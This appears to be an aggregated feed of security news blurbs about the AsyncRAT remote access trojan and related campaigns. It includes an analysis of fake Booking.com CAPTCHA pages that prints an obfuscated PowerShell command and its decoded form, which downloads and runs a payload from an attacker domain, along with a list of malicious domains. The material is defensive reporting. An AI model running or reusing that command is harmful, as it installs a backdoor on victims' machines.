Cyber Threats Q1 2024 revealed: Cat-Phishing, Living Off the Land, Fake Invoices

Cat-phishing, using a popular Microsoft file transfer tool to become a network parasite, and bogus invoicing were among the notable techniques cybercriminals deployed in Q1 2024, per @HP Wolf Security Report. https://tinyurl.com/mpjd96xp

Unmasking AsyncRAT New Infection Chain | McAfee Blog

Authored by Lakshya Mathur & Vignesh Dhatchanamoorthy AsyncRAT, short for “Asynchronous Remote Access Trojan,” is a sophisticated piece of malware designed to compromise the security of computer systems and steal sensitive information. What sets AsyncRAT apart from other malware strains is its stealthy nature, making it a formidable adversary in the world of cybersecurity. McAfee Labs has…

View On WordPress

Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers. The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days. Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.

As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard. Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.

instructions to infect your own device If you’re using Chrome, you may see this warning:

Chrome issues a warning but it may the danger may be unclear to users The warning is nice, but it’s not very clear what this warning is for, in my opinion. Users of Malwarebytes’ Browser Guard will see this warning:

Malwarebytes Browser Guard’s clipboard warning “Hey, did you just copy something? Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.” Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow. What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger. pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v" The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is: powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv" The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves. Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT. Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT. The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.

IOCs The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones. (booking.)chargesguestescenter[.]com (booking.)badgustrewivers.com[.]com (booking.)property-paids[.]com (booking.)rewiewqproperty[.]com (booking.)extranet-listing[.]com (booking.)guestsalerts[.]com (booking.)gustescharge[.]com kvhandelregis[.]com patheer-moreinfo[.]com guestalerthelp[.]com rewiewwselect[.]com hekpaharma[.]com bkngnet[.]com partnervrft[.]com

Malwarebytes blocks the download from bkngnet[.]com How to stay safe There are a few things you can do to protect yourself from falling victim to these and similar methods: Do not follow instructions provided by a website you visited without thinking it through. Use an active anti-malware solution that blocks malicious websites and scripts. Use a browser extension that blocks malicious domains and scams. Disable JavaScript in your browser before visiting unknown websites. The clipboard access is triggered by a JavaScript function document.execCommand(‘copy’). Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.

AsyncRAT Campaign Uses Python Payloads and TryCloudflare Tunnels for Stealth Attacks

Source: https://thehackernews.com/2025/02/asyncrat-campaign-uses-python-payloads.html

More info: https://www.forcepoint.com/blog/x-labs/asyncrat-reloaded-python-trycloudflare-malware

Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets

A new malware campaign is exploiting a weakness in Discord’s invitation system to deliver an information stealer called Skuld and the AsyncRAT remote access trojan. “Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers,” Check Point said in a technical report. “The attackers combined the ClickFix phishing…

View On WordPress

Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets

http://i.securitythinkingcap.com/TLLdlX

AsyncRAT: La amenaza silenciosa que susurra desde las sombras

En el vertiginoso mundo de las amenazas persistentes avanzadas (APT) y el ciberdelito, emerge una sombra sigilosa, un depredador digital que acecha en las profundidades de la red: AsyncRAT. No es un actor nuevo en la escena, pero su constante evolución y su presencia ubicua lo convierten en un tema de análisis ineludible para cualquier profesional de la seguridad informática que se precie. ¿Creen…

AsyncRAT surge como una nueva amenaza mientras los ciberdelincuentes explotan plataformas legítimas, según Check Point Research

El último Índice Global de Amenazas destaca que Androxgh0st ha recuperado el primer puesto en Argentina  y ha afectado al 3,29% de las empresas. Check Point Research, la división de Inteligencia de Amenazas Check Point® Software Technologies Ltd. (NASDAQ: CHKP), pionero y líder global en soluciones de ciberseguridad, publica su Índice Global de Amenazas del mes de febrero de 2025, en el que…

Η Check Point® Software Technologies Ltd...

AsyncRAT-Kampagne nutzt Python-Payloads und TryCloudflare-Tunnel für verdeckte Angriffe

AsyncRAT-Kampagne nutzt Python-Payloads und TryCloudflare-Tunnel für verdeckte Angriffe: https://www.it-boltwise.de/asyncrat-kampagne-nutzt-python-payloads-und-trycloudflare-tunnel-fuer-verdeckte-angriffe.html

Summary

🔍 Purpose: Recorded Future's SecOps Dashboard streamlines incident analysis, integrating telemetry from tools like SIEMs, SOARs, and EDR systems for threat identification.

📊 Features:

Trending Malware Analysis: Identifies rising threats, such as AsyncRAT linked to phishing campaigns by nation-state actors.

Enrichment & Insights: Associates threats with MITRE patterns, TTPs, and actionable indicators for deeper context.

Historical Comparison: Offers a 30-day analysis of malware activity for anomaly detection.

Insights Based on Numbers

📈 Phishing Campaigns: Anomaly detection highlighted AsyncRAT spikes tied to a nation-state actor, TAG-66.

🔄 Integration Flexibility: Provides seamless connectivity to security tools, enhancing threat mitigation workflows.

SocGholish Malware Exploits BOINC Project for Covert Cyberattacks

The Hacker News : The JavaScript downloader malware known as SocGholish (aka FakeUpdates) is being used to deliver a remote access trojan called AsyncRAT as well as a legitimate open-source project called BOINC. BOINC, short for Berkeley Open Infrastructure Network Computing Client, is an open-source "volunteer computing" platform maintained by the University of California with an aim to carry out "large-scale http://dlvr.it/T9vhdW Posted by : Mohit Kumar ( Hacker )

Stealthy AsyncRAT malware attacks targets US infrastructure for 11 months

Cybercriminals Abusing Cloudflare Tunnels to Evade Detection and Spread Malware

Source: https://thehackernews.com/2024/08/cybercriminals-abusing-cloudflare.html

More info:

https://www.esentire.com/blog/quartet-of-trouble-xworm-asyncrat-venomrat-and-purelogs-stealer-leverage-trycloudflare

https://www.proofpoint.com/us/blog/threat-insight/threat-actor-abuses-cloudflare-tunnels-deliver-rats

https://bit.ly/3qXad6I - 🌐 Cybersecurity firm Bitdefender has conducted an extensive investigation into a targeted cyber attack against East-Asian infrastructure, uncovering the workings of a sophisticated, presumably custom malware dubbed as Logutil backdoor. This operation reportedly ran for over a year, aiming to compromise credentials and exfiltrate data. #Cybersecurity #Bitdefender #LogutilBackdoor 🕵️‍♀️The operation, traced back to early 2022, leveraged multiple tools to achieve its nefarious ends, Logutil being the primary one. Notably, AsyncRat was used during the initial stages of infection. The investigation suggests that CobaltStrike was part of the attackers' arsenal too. The victim of this operation was a company operating in the Technology/IT Services industry in East Asia. #CyberAttack #AsyncRat #CobaltStrike 💾 Modern cybercrime syndicates are increasingly leveraging legitimate components to perpetrate their attacks. For instance, DLL hijacking and misuse of legitimate scheduled tasks and services are commonly employed tactics. Notably, state-affiliated actors such as the APT29 group have used this strategy effectively, substituting a binary responsible for updating Adobe Reader with a malicious component, thus achieving persistence. #CybercrimeTactics #APT29 #AdobeReader 📍 These stealthy tactics were evident in the recent incident as well. The perpetrators deployed malware in locations less likely to be suspected of hosting such threats and more likely to be excluded from the security systems' scrutiny. #MalwareDeployment #CybersecurityChallenge 🔐 In this attack, the actors demonstrated capabilities of collecting credentials from various applications including MobaXterm, mRemoteNG, KeePass, and even Chrome passwords and history. They also attempted data exfiltration from mysql servers by accessing server process memory, and made attempts to dump LSASS memory. #DataExfiltration #CredentialTheft 🔁 The investigation also found that the attackers could infect other systems if an RDP session was established with the infected system, by placing malicious components in \tsclient\c\ subfolders if tsclient share was enabled. This highlights the extent of the attack's complexity and potential for propagation.